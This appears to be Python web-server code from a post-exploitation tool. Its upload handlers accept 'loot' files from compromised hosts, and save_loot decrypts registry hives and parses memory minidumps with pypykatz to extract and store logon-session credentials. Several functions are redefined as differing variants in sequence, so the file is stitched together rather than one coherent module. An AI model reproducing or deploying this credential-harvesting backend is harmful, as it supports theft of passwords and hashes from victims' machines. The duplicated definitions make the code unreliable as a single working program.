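def upload():
    """Upload one or more files.

    Reads the multipart field ``file[]`` from the current request.  When the
    ``loot`` query parameter carries a non-empty value, each part is handed to
    ``save_loot`` under that id and ``decrypt_hive`` runs once afterwards;
    otherwise each part goes to ``save_file``.  The mere presence of the
    ``script`` query parameter is forwarded as ``encrypted=`` and selects the
    plain ``('OK', 200)`` reply instead of a redirect to ``/fileexchange``.

    A part with an empty filename aborts the loop with a redirect back to the
    request URL; parts stored before it are kept.
    """
    file_list = request.files.getlist("file[]")
    is_from_script = "script" in request.args
    # Resolve the loot id once, up front.  It used to be bound only inside the
    # loop, so a request with ``loot`` set but no usable part reached
    # decrypt_hive() with an unbound name and failed with UnboundLocalError.
    loot_id = request.args.get("loot")

    for file in file_list:
        if file.filename == '':
            return redirect(request.url)
        if file:
            # loot_id and file.filename both come straight from the client.
            # NOTE(review): confirm the log handler neutralises control
            # characters and that save_file() sanitises the name before it
            # builds a path from it.
            if loot_id:
                log.info("Loot received - %s", loot_id)
                save_loot(file, loot_id, encrypted=is_from_script)
            else:
                log.info("File received - %s", file.filename)
                save_file(file, encrypted=is_from_script)

    if loot_id:
        decrypt_hive(loot_id)
        push_notification("reload", "Update Loot", "")
    else:
        push_notification("reload", "Update Fileexchange", "")

    # ``script`` is a caller-controlled switch: it decides both how the body
    # is treated (encrypted=) and the response shape.
    if is_from_script:
        return ('OK', 200)
    return redirect('/fileexchange')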
def process_file(file, loot_id, is_from_script, remote_addr):
    """Store one uploaded part and build the push-notification payload.

    With a truthy ``loot_id`` the part goes through ``save_loot`` and
    ``decrypt_hive``; any exception raised there is logged and turned into a
    "danger" message instead of propagating.  Without a ``loot_id`` the part
    is stored with ``save_file`` and an empty dict is returned.

    Returns:
        A dict with ``title``, ``body`` and ``category`` for loot, ``{}`` for
        a plain file.
    """
    if not loot_id:
        # Plain file exchange: nothing to announce, hence the empty payload.
        log.info("File received - %s" % file.filename)
        save_file(file, encrypted=is_from_script)
        return {}

    log.info("Loot received - %s" % loot_id)
    try:
        save_loot(file, loot_id, encrypted=is_from_script)
        decrypt_hive(loot_id)
        # The filename is client-supplied and is echoed into the body as-is.
        # NOTE(review): confirm the consumer of this payload escapes it.
        stored_text = "%s from %s has been stored." % (
            file.filename,
            remote_addr,
        )
        notification = dict(
            title="Loot received!",
            body=stored_text,
            category="success",
        )
    except Exception as err:
        # The raw exception text becomes the body of the notification.
        notification = dict(
            title="Error while processing loot",
            body=str(err),
            category="danger",
        )
        log.exception(err)
    return notification
def upload():
    """Store every part of the ``file[]`` form field.

    A part with an empty filename ends processing with a redirect back to the
    request URL; parts already stored are kept.  Otherwise the response is a
    redirect to ``/fileexchange``.
    """
    for part in request.files.getlist("file[]"):
        if part.filename == '':
            return redirect(request.url)
        if not part:
            continue
        # The part is handed over unchanged, client-chosen filename included.
        # NOTE(review): confirm save_file() sanitises the name.
        save_file(part)
    return redirect('/fileexchange')
def upload():
    """Store every part of the ``file[]`` form field and notify listeners.

    A part with an empty filename ends processing with a redirect back to the
    request URL, before any notification is pushed.  After the loop a
    "reload" notification is pushed; the reply is ``('OK', 200)`` when the
    ``noredirect`` query parameter is present, else a redirect to
    ``/fileexchange``.
    """
    incoming = request.files.getlist("file[]")
    # Presence alone counts; the parameter's value is never read.
    skip_redirect = "noredirect" in request.args

    for part in incoming:
        if part.filename == '':
            return redirect(request.url)
        if not part:
            continue
        # The part is handed over unchanged, client-chosen filename included.
        # NOTE(review): confirm save_file() sanitises the name.
        save_file(part)

    push_notification("reload", "Update Fileexchange", "")
    return ('OK', 200) if skip_redirect else redirect('/fileexchange')
def save_loot(file, loot_id, encrypted=False):
    """Store an uploaded loot file and record it according to its type.

    The file is written below ``LOOT_DIR`` by ``save_file``; the type reported
    by ``get_loot_type`` for the stored path then selects the handler:
    ``"DMP"`` is parsed with pypykatz and stored through ``store_minidump``,
    ``"SYSINFO"`` goes to ``add_sysinfo``, and everything else is treated as
    a registry hive and goes to ``add_hive``.

    No exception is handled here; a missing pypykatz install or a parser
    failure propagates to the caller.
    """
    stored_path = save_file(file, dir=LOOT_DIR, encrypted=encrypted)
    kind = get_loot_type(stored_path)
    log.debug("Saving %s [%s]" % (stored_path, kind))

    if kind == "SYSINFO":
        add_sysinfo(loot_id, stored_path)
        return

    if kind != "DMP":
        # Fallback branch: any other type is handled as a registry hive.
        add_hive(loot_id, kind, stored_path)
        return

    # Imported lazily, so the dependency is only needed for minidumps.
    from pypykatz.pypykatz import pypykatz

    # The dump is uploaded content and is parsed inside this process.
    dump = pypykatz.parse_minidump_file(stored_path)
    sessions = []
    for _, session in dump.logon_sessions.items():
        sessions.append(json.loads(session.to_json()))
    # NOTE(review): the serialised sessions presumably hold credential
    # material; confirm the backing store is access-controlled.
    store_minidump(loot_id, json.dumps(sessions), stored_path)
def save_loot(file, loot_id, encrypted=False):
    """Store an uploaded loot file and record it according to its type.

    The file is written below ``LOOT_DIR`` by ``save_file``; the type reported
    by ``get_loot_type`` for the stored path then selects the handler:
    ``"DMP"`` is parsed with pypykatz and stored through ``store_minidump``,
    ``"SYSINFO"`` goes to ``add_sysinfo``, and everything else is treated as
    a registry hive and goes to ``add_hive``.

    An ``ImportError`` raised by any of the three handlers is logged and
    swallowed, leaving the file on disk but unprocessed.  Every other
    exception propagates to the caller.
    """
    stored_path = save_file(file, dir=LOOT_DIR, encrypted=encrypted)
    kind = get_loot_type(stored_path)

    try:
        if kind == "SYSINFO":
            add_sysinfo(loot_id, stored_path)
        elif kind != "DMP":
            # Fallback branch: any other type is handled as a registry hive.
            add_hive(loot_id, kind, stored_path)
        else:
            # Imported lazily, so the dependency is only needed for minidumps.
            from pypykatz.pypykatz import pypykatz

            # The dump is uploaded content and is parsed inside this process.
            dump = pypykatz.parse_minidump_file(stored_path)
            sessions = []
            for _, session in dump.logon_sessions.items():
                sessions.append(json.loads(session.to_json()))
            # NOTE(review): the serialised sessions presumably hold credential
            # material; confirm the backing store is access-controlled.
            store_minidump(loot_id, json.dumps(sessions), stored_path)
    except ImportError as err:
        log.error("You have unmet dependencies, loot could not be processed")
        log.exception(err)